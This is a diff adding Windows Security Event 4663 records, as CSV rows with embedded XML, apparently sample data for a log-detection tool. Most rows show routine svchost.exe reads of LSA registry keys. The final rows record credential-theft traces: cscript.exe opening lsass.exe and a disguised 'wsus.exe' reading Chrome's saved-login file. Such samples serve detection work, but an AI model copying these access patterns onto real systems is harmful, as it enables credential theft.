+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452918</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452917</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452915</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452913</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452912</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452911</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452910</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452909</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452908</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452907</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452906</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
